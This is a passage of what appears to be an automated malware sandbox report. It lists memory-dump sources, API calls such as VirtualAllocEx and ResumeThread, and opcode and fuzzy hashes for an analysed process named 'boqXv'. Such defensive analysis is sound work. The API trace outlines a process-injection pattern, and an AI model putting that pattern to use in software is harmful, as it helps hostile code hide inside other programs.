                                                • Opcode ID: b32ccd4fbc1bf49feb60159b12fe71d60cc26bfe1edd30dd0da00a5ef54f669d
                                                • Instruction ID: ee9b8783e5791dbd48c31196616034d7b463b319aae9b60f6db96f8266339dde
                                                • Opcode Fuzzy Hash: b32ccd4fbc1bf49feb60159b12fe71d60cc26bfe1edd30dd0da00a5ef54f669d
                                                • Instruction Fuzzy Hash: 331158B19003488FDB10DFAAC4447DEFBF4EB88324F20842AD459A7240CA34A545CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B8794E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 41059bdab351aed153326d95d954913b600c00ffac93d6720d4dd85d083ed5c1
                                                • Instruction ID: f876d048220dbd591b03013ab7e4318ade9365bd6a5109f6fed3305a42c98229
                                                • Opcode Fuzzy Hash: 41059bdab351aed153326d95d954913b600c00ffac93d6720d4dd85d083ed5c1
                                                • Instruction Fuzzy Hash: FA1126B29002599FDB10DFAAC844ADEBBF5EB88324F208419E559A7250CB75A544CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 7b6e4e8ee3baf632ef861cf0b8a26f643e4374d7585bc6601f8e194163d64e9c
                                                • Instruction ID: 1db1f88692c6f146310fb552cbd979ab21eb10b9550eaeb047c9dbca029559b0
                                                • Opcode Fuzzy Hash: 7b6e4e8ee3baf632ef861cf0b8a26f643e4374d7585bc6601f8e194163d64e9c
                                                • Instruction Fuzzy Hash: 1D1166B19003488FDB20DFAAC4447DEFBF4EB88324F20842AC459A7240CB34A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B8B1E5
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: d928c6e0362bf9f30d8c53686e593124dd876354699948f0209631f1bf093f9c
                                                • Instruction ID: b521ede9abb45043b1513459e78ccbef67add0a1cdd0c9f5126d9e115b181c91
                                                • Opcode Fuzzy Hash: d928c6e0362bf9f30d8c53686e593124dd876354699948f0209631f1bf093f9c
                                                • Instruction Fuzzy Hash: 7F1122B59003499FDB10DF9AC884BDFFBF8EB48324F10841AE558A7200C374A944CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 025BAF56
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 6418261dca8ffe123c58b51da04fd9e5b35ec0a1b70d7e24eb60f0ff2b01eac1
                                                • Instruction ID: b31a2e6b66d385c3cf8f59fdf5bf8775b1c50a92038340a2d91734d27a24d947
                                                • Opcode Fuzzy Hash: 6418261dca8ffe123c58b51da04fd9e5b35ec0a1b70d7e24eb60f0ff2b01eac1
                                                • Instruction Fuzzy Hash: 6811E0B6D003498FDB10DF9AC448ADEFBF4AF88324F10846AD469B7250C379A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 07B8B1E5
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: b42f4be0473a1ffd5e697f50fea69457a25024840a1371da7090817b2d0d1d07
                                                • Instruction ID: d8ff7ef4b6f03cb08ef48075e13f393393fc84538be4a9a24a14b955a0f451ab
                                                • Opcode Fuzzy Hash: b42f4be0473a1ffd5e697f50fea69457a25024840a1371da7090817b2d0d1d07
                                                • Instruction Fuzzy Hash: 1611F2B59103499FEB10EF9AC849BDFBBF8EB48324F10845AE559A7200C375A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1897172380.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_a1d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc5dceda16f81121b4101469e940fe6d35950f30fc0a1757709824fae8beec4d
                                                • Instruction ID: 93c14653c1df90446ead95b82b28a7c8950711707efb178bd9145772590a0787
                                                • Opcode Fuzzy Hash: bc5dceda16f81121b4101469e940fe6d35950f30fc0a1757709824fae8beec4d
                                                • Instruction Fuzzy Hash: DB212675544204EFCB04DF14D5C4B66BFA5FB84314F24C56DE8094F296C33AE886CA62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1897172380.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_a1d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62700e5a61808801666f0184320905bddc13c9c93adebaab04775d9cd22b590b
                                                • Instruction ID: 77e557903849150181521b41b2f8d5b88df5103ee1f5cf42d5983c1ee2052c52
                                                • Opcode Fuzzy Hash: 62700e5a61808801666f0184320905bddc13c9c93adebaab04775d9cd22b590b
                                                • Instruction Fuzzy Hash: 80212671604300EFCB05DF14C5C0BA6BFA5FB94314F20C66DEC094B256C336D886CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1897172380.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_a1d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 20a5d579239d9d177e138690714e66528a9851eee1e612cf29fb8860b85df53b
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: BD119D79544280DFDB06CF14D5C4B55BFB1FB84318F24C6AED8494B656C33AE88ACBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1897172380.0000000000A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A1D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_a1d000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: fd44a0200b7355a3b687d5cddc908e0c2bc36d8d7e2b3bc9da6a8f88ad92c728
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: BB119D75504280DFDB06CF14D5C4B95BFA1FB94318F24C6AADC494B656C33AD84ACBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.6%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:172
                                                Total number of Limit Nodes:18
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5c572179da06b54fb469fdf68f657c613040287c96b9bc1304f844671f9310d
                                                • Instruction ID: 1e26e80c3bdbe88208c0b46ea62cdda0f3071b017898359783426e140bb7b381
                                                • Opcode Fuzzy Hash: d5c572179da06b54fb469fdf68f657c613040287c96b9bc1304f844671f9310d
                                                • Instruction Fuzzy Hash: 8E53F971C10B1A8ACB51EF68C880599F7B1FF99300F15D79AE4587B221FB70AAD5CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b055e354601a2127ee3b6b5e022802332b2a3cccc0b532812af0bd7097848af3
                                                • Instruction ID: 3c97c330729ceda461cc1dc8e8ac036150a9279d3f12c239a5170ef0c01906a3
                                                • Opcode Fuzzy Hash: b055e354601a2127ee3b6b5e022802332b2a3cccc0b532812af0bd7097848af3
                                                • Instruction Fuzzy Hash: 18333131D10B1A8ECB11EF68C89059DF7B5FF99300F15C79AE458A7261EB70AAC5CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c80fb6c91052660955b637b5588a09ee8923cfdd9668a95ac2570acc3177484
                                                • Instruction ID: dfc0241469063e528ce376b9c5ef9825f2455e0e2ab5b62a22a7676246428076
                                                • Opcode Fuzzy Hash: 2c80fb6c91052660955b637b5588a09ee8923cfdd9668a95ac2570acc3177484
                                                • Instruction Fuzzy Hash: E9B17170E1020ACFDB14DFAAD88179DBBF2AF88314F18C129D514E7295EB749889CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4c18c8211529edaead052aa023ad4cab70ae29d667ece48eab69c0fdfb06f1df
                                                • Instruction ID: 1764ed32253d4698d09424c0ce60e276241102cef1403944ec9bf2edb87834fd
                                                • Opcode Fuzzy Hash: 4c18c8211529edaead052aa023ad4cab70ae29d667ece48eab69c0fdfb06f1df
                                                • Instruction Fuzzy Hash: BE916F70E102099FDF14DFAAC98479DFBF2AF88714F18C129E514A7295DB749889CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2976628016.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6860000_boqXv.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 9d6e69ac4acd6a3931d23107abf6b9d6dcff41b6099c7ed3850fa7342bf7eca3
                                                • Instruction ID: adbf8041b15daa7c34918a24d2e5c7666084f22e78464e4b83dfcd187bebe714
                                                • Opcode Fuzzy Hash: 9d6e69ac4acd6a3931d23107abf6b9d6dcff41b6099c7ed3850fa7342bf7eca3
                                                • Instruction Fuzzy Hash: 45714670A00B058FDBA8DF2AD44475ABBF5FF88304F00892DE58AD7A50DB74E945CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2977058100.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6870000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b83e22124d1471e602dedeed4beb0d471d309e110f461802f4e0bcfa9f8c52a9
                                                • Instruction ID: c56ee8b4464760f78564259fec4d49c938a66e7faa8ab387520358b6a25cdf5c
                                                • Opcode Fuzzy Hash: b83e22124d1471e602dedeed4beb0d471d309e110f461802f4e0bcfa9f8c52a9
                                                • Instruction Fuzzy Hash: 7C410F72D002598BCB04DF69D8447AEBBF9EF88310F14856ADA04E7341DB78E885CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0686D022
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2976628016.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6860000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 997fc5ede3c929a5f093c9f16a9b8428cc5784562b6f161b023631a020e62c2a
                                                • Instruction ID: 25d5af75ee614417635bf7a399e2bb8ffdf2d1554d7108532aeb5f091fcd5285
                                                • Opcode Fuzzy Hash: 997fc5ede3c929a5f093c9f16a9b8428cc5784562b6f161b023631a020e62c2a
                                                • Instruction Fuzzy Hash: 8651CFB1D00359DFDB14CFAAC884ADEBBB5FF48314F24812AE819AB210D7759885CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0686D022
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2976628016.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6860000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: f34c42bef538b46a89da89dcbd274598027c3bad317818f4629fdc1d472881b5
                                                • Instruction ID: 261b8faf9f092d1bfc4b68191e5d7b231afef9857396eb323b596f4c8f571023
                                                • Opcode Fuzzy Hash: f34c42bef538b46a89da89dcbd274598027c3bad317818f4629fdc1d472881b5
                                                • Instruction Fuzzy Hash: 7341BFB1D00359DFDB14CFAAC884ADEBBB5FF48314F24812AE818AB210D7759885CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 0686F711
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2976628016.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6860000_boqXv.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 72d056c31910e674e78f8c8bc181e04609306e68bc9c2d521792f0b9a375d88d
                                                • Instruction ID: a228f4727e952c14bf89af5ec116914130475d9fe51b175424e714db4f3d1af5
                                                • Opcode Fuzzy Hash: 72d056c31910e674e78f8c8bc181e04609306e68bc9c2d521792f0b9a375d88d
                                                • Instruction Fuzzy Hash: 364118B8900245DFCB54CF5AD448AAEBBF6FB88314F24C459E619AB321D774E841CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(000000ED), ref: 0687E777
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2977058100.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_6870000_boqXv.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PH^q
                                                • API String ID: 0-2549759414
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q
                                                • API String ID: 0-2625958711
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q
                                                • API String ID: 0-2625958711
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q
                                                • API String ID: 0-2625958711
                                                Uniqueness

                                                Uniqueness Score: -1.00%


                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8efa6145751ac107208ab4819acbfa1060db3f53769b9ace02d84acdfc7e1ee
                                                • Instruction ID: 7bbb4062d3e89e2e7e702189855812fa22569b83b0532128f6be247907e963d2
                                                • Opcode Fuzzy Hash: f8efa6145751ac107208ab4819acbfa1060db3f53769b9ace02d84acdfc7e1ee
                                                • Instruction Fuzzy Hash: 66214B34610205CFDB24DB38D659AADB7F2EB4D304F2440A8E406EB3A1DB359C44CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0245de56fb5864b242ead13c8ef809836f083c8899d12fd23263bad075b2d51
                                                • Instruction ID: e310536e36dc44998e555d1f1a3518c739ea2df01e75cedce61e73c93a6761e7
                                                • Opcode Fuzzy Hash: d0245de56fb5864b242ead13c8ef809836f083c8899d12fd23263bad075b2d51
                                                • Instruction Fuzzy Hash: 37216831E102069BDB15CFA5D45459EF7B5AF89300F14851AE816FB392DB71988ACB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0fe795fba48391f569305069a0c34d5cf1dc5206aef542450b232d94222b434
                                                • Instruction ID: ec02d7968458b7bc0b808a2ee32252a61c891a626de30d8d9267032a08384e60
                                                • Opcode Fuzzy Hash: f0fe795fba48391f569305069a0c34d5cf1dc5206aef542450b232d94222b434
                                                • Instruction Fuzzy Hash: B621A43871020ACFEB24DB29C5557AE77F6EF88300F100068D546EB391DB75AD94CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ff2558ac378f313b229e1d7404ef7967025c4da8fb61a920fd3920ec99a412b
                                                • Instruction ID: 39bdfa1aabfa3b51b4cb557fe532c5cd7fbd72ee75538aea9f759460250f2156
                                                • Opcode Fuzzy Hash: 7ff2558ac378f313b229e1d7404ef7967025c4da8fb61a920fd3920ec99a412b
                                                • Instruction Fuzzy Hash: 2A219238710209CFDB14DB24C5147AE77F6AF48300F100068D546EB391DB35AC94CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e3d30b6b6c81ed1a49cc5c7fc400bd2222f6c5696ac1905b4425151b8581c324
                                                • Instruction ID: d03fee8eb146fb5d7778b0cc228d03f7f0681e241f2edecb2de869999e334466
                                                • Opcode Fuzzy Hash: e3d30b6b6c81ed1a49cc5c7fc400bd2222f6c5696ac1905b4425151b8581c324
                                                • Instruction Fuzzy Hash: 332193386101024FDF21DB68E888729779DE748324F145964D449CB2A6EB38EC89DF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 99dfc97b4e4ae447e8147c181a9e29c7fdf1d4059790134057944e99ebe18248
                                                • Instruction ID: 18497dc886ec20cc2334e8dc843238f0d57439dde4f417cd3538c455224994d6
                                                • Opcode Fuzzy Hash: 99dfc97b4e4ae447e8147c181a9e29c7fdf1d4059790134057944e99ebe18248
                                                • Instruction Fuzzy Hash: 1F211938714205CFDB14DB79C658AAEB7F6EB4D304F2440A8E406EB3A1DB369D44CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14604d61c26ec31c5e2b1c65236cd5ecdf50e6c531f4f47bed5f76ce4f9ed6e4
                                                • Instruction ID: e0bf41df541f2a3d2159edaefaccec56ffafbe4e3d24603121d43998c39e3691
                                                • Opcode Fuzzy Hash: 14604d61c26ec31c5e2b1c65236cd5ecdf50e6c531f4f47bed5f76ce4f9ed6e4
                                                • Instruction Fuzzy Hash: BD11E730F101055FDB10EAB9944436FBBEAEB88724F144676E51ACB2C2EA75C899C392
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b66e226693e962902864a47b4285044415900918cdf8a0453ab90b6277321d4
                                                • Instruction ID: d8d08f885caeb6237672576a3cf9e6131e71f6b648cff70677595def216e7106
                                                • Opcode Fuzzy Hash: 8b66e226693e962902864a47b4285044415900918cdf8a0453ab90b6277321d4
                                                • Instruction Fuzzy Hash: 3C11567AE102019FDB21EB78A88C66E7BA6EB48310F084565D909D3385E7399D158B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 47ffb27914cc8f7760ba66cf2cf55b7dde94a049532b7a5087d98d9332fd9389
                                                • Instruction ID: 1336cb6adb0dacea3ddb285a4258e8f9e13048138898b8b70303b3d1b5a9f594
                                                • Opcode Fuzzy Hash: 47ffb27914cc8f7760ba66cf2cf55b7dde94a049532b7a5087d98d9332fd9389
                                                • Instruction Fuzzy Hash: 8D11BF30B2020A8FEF20DA78E48437D72A9FB45320F14C9B9D406CB282DA65CDC98BC1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df1111f0080a1708b62af29b85110c16d01d222faf423561a43087bc2e270f4b
                                                • Instruction ID: 121488b7d285d8b6cfcb6965fdffb54f9a344c25655e6a0371d50646bf8b3a85
                                                • Opcode Fuzzy Hash: df1111f0080a1708b62af29b85110c16d01d222faf423561a43087bc2e270f4b
                                                • Instruction Fuzzy Hash: D6118631B202069BFF249A74E48437D7699F745360F18C97AD446DB2C3DA65CDC98BC1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab11f4470e1b1fa48867f494025ab01a52e7b715ff9c0cdb3e4c52323477111e
                                                • Instruction ID: 9ad2e5429b3d1926756207983f35ea8ef2d5747b7295f05d4715e65bb3ce69d9
                                                • Opcode Fuzzy Hash: ab11f4470e1b1fa48867f494025ab01a52e7b715ff9c0cdb3e4c52323477111e
                                                • Instruction Fuzzy Hash: 83117375A203158FCF21EFB8C4956ADBBF5AB48311B184479D805EB341EB35D8898B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8a261314fbed1cb38c4993bd3b79f4f4b2f7115e39e0315541b2e7ef23f053c3
                                                • Instruction ID: 68a687544da787e0828f2f021c4329936f343b4434b9f2c7eaee4fa84576f9f1
                                                • Opcode Fuzzy Hash: 8a261314fbed1cb38c4993bd3b79f4f4b2f7115e39e0315541b2e7ef23f053c3
                                                • Instruction Fuzzy Hash: F5018435A103158FDF21EFB8845429DBBF5EF48210B1444B9D805EB382EB75D8C98B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000014.00000002.2932508852.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_20_2_3200000_boqXv.jbxd
                                                Similarity
                                                • API ID:
